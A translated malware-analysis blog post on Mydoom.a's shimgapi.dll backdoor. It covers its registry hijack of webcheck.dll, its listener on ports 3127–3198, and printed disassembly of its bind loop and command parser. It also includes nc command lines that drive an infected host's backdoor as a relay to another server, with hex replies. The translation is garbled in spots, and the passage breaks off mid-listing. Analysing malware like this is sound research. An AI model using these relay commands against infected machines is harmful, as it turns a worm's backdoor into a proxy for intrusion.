Analysis of shimgapi. dll of Mydoom.

Source: http://blog.csdn.net/sunwear/

Tombkeeper # whitecell.org

The backdoor of Mydoom. a exists as a dll. By modifying the corresponding key value of the registry, you can load yourself into the process space of the resource manager.

Under normal circumstances, the Registry should look like this:
HKEY_CLASSES_ROOTCLSID {E6FB5E20-DE35-11CF-9C87-00AA005127ED} InProcServer32
<No name> REG_EXPAND_SZ % SystemRoot % System32webcheck. dll
ThreadingModel REG_SZ Apartment

Mydoom. a replaces % SystemRoot % System32webcheck. dll with its own shimgapi. dll.

By default, the shimgapi. dll backdoor listens to port 3127. If the port is occupied, it increases progressively, but not greater than 3198.

The backdoor provides two functions:
1. Act as a port forwarding proxy
2. As a backdoor, the receiver uploads and executes the program

Related code:
. Text: 7E1A1C44 sub_7E1A1C44 proc near; data xref: start + 19o
. Text: 7E1A1C44
. Text: 7E1A1C44 WSAData = WSAData ptr-190 h
. Text: 7E1A1C44
. Text: 7E1A1C44 sub esp, 190 h
. Text: 7E1A1C4A push esi
. Text: 7E1A1C4B push edi
. Text: 7E1A1C4C call sub_7E1A1A1F
. Text: 7E1A1C51 lea eax, [esp + 198 h + WSAData]
. Text: 7E1A1C55 push eax; lpWSAData
. Text: 7E1A1C56 push 2; wVersionRequested
. Text: 7E1A1C58 call ds: WSAStartup
. Text: 7E1A1C5E call Address
. Text: 7E1A1C63 mov edi, ds: Sleep
. Text: 7E1A1C69 mov esi, 0C37h; listening on port 3127
. Text: 7E1A1C6E
. Text: 7E1A1C6E loc_7E1A1C6E:; code xref: sub_7E1A1C44 + 50j
. Text: 7E1A1C6E push 3
. Text: 7E1A1C70 push esi
. Text: 7E1A1C71 call sub_7E1A1B52; bind subroutine
. Text: 7E1A1C76 pop ecx
. Text: 7E1A1C77 pop ecx
. Text: 7E1A1C78 pushing 400 h; dwMilliseconds
. Text: 7E1A1C7D call edi; Sleep
. Text: 7E1A1C7F cmp esi, 0C7Eh; port no greater than 3198
. Text: 7E1A1C85 jle short loc_7E1A1C93
. Text: 7E1A1C87 push 800 h; dwMilliseconds
. Text: 7E1A1C8C call edi; Sleep
. Text: 7E1A1C8E mov esi, 0C37h
. Text: 7E1A1C93
. Text: 7E1A1C93 loc_7E1A1C93:; code xref: sub_7E1A1C44 + 41j
. Text: 7E1A1C93 inc esi; If the port is greater than 3198, 1 is subtracted and bind again
. Text: 7E1A1C94 jmp short loc_7E1A1C6E
. Text: 7E1A1C94 sub_7E1A1C44 endp

After port 3127 receives the connection, if the first character of the recv is x04, the transfer-in port forwarding process --> determines whether the second character is 0x01 --> gets 5th ~ Use eight or four characters as the destination IP address --> use three or four characters as the destination port --> connect and forward data with the current socket

For example, we use x00x6exc0xa8x01x0b as the connection command. x00x6e is port 110, and xc0xa8x01x0b is 192.168.1.11.

# Printf x04x01x00x6exc0xa8x01x0bx00 | nc 192.168.7.33 3127
Z + OK Microsoft Exchange Server 2003 POP3 server version 6.5.6944.0 ready.

We can see that the session sent to port 110 of 192.168.1.11 is switched back. Note that a section of data is included before the returned characters. Test again:

# Printf x04x01x00x6exc0xa8x01x0bx00 | nc 192.168.7.33 3127 | xxd-g 1
0000000: 04 5a 00 6e c0 a8 01 0b 2b 4f 4b 20 4d 69 63 72. Z. n... + OK Micr
0000010: 6f 73 6f 66 74 20 45 78 63 68 61 6e 67 65 20 53 osoft Exchange S
0000020: 65 72 76 65 72 20 32 30 33 20 50 4f 50 33 20 erver 2003 POP3
0000030: 73 65 72 76 72 20 76 65 72 73 69 6f 6e 20 36 server version 6
0000040: 2e 35 2e 36 39 34 34 2e 30 20 28 64 63 2e 69 6e. 5.6944.0

Try to send the command to connect to port 98 that does not exist:
# Printf x04x01x00x62xc0xa8x01x0bx00 | nc 192.168.7.33 3127 | xxd-g 1
0000000: 04 5b 00 62 c0 a8 01 0b. [. B ....

Obviously, that piece of data indicates the connection status. 04 5a indicates that the connection is successful, and 04 5b indicates that the connection fails. The following is the connection Command sent in the past. This feature may be designed by the worm author to facilitate client judgment.

Related code:
. Text: 7E1A17F5
. Text: 7E1A17F5 loc_7E1A17F5:; code xref: sub_7E1A17BA + 2Bj
. Text: 7E1A17F5 cmp byte ptr [ebp-1], 4; compare whether the first character is 0x04
. Text